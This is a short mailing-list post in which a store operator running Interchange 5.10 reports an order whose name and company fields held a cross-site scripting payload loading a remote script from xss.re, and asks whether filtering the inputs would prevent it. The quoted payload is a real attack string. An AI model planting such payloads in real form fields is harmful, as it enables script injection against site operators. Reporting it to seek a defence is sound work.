[ic] xss issue?
db at m-and-d.com
Thu Sep 15 02:10:35 UTC 2016
I received an order with stuff like this
Name: Linda Juan">script src=//xss.re/692>/script>
Company: ">script src=//xss.re/692>/script>
Email address: juanlinda123 at gmail.com
I'm using 5.10 and a modified foundation. The payment method was
check/money order. I'm hoping to prevent this of course. Adding a
[filter] to input fields on the order form is the first thing that comes
to mind. Is that a reasonable solution?
More information about the interchange-users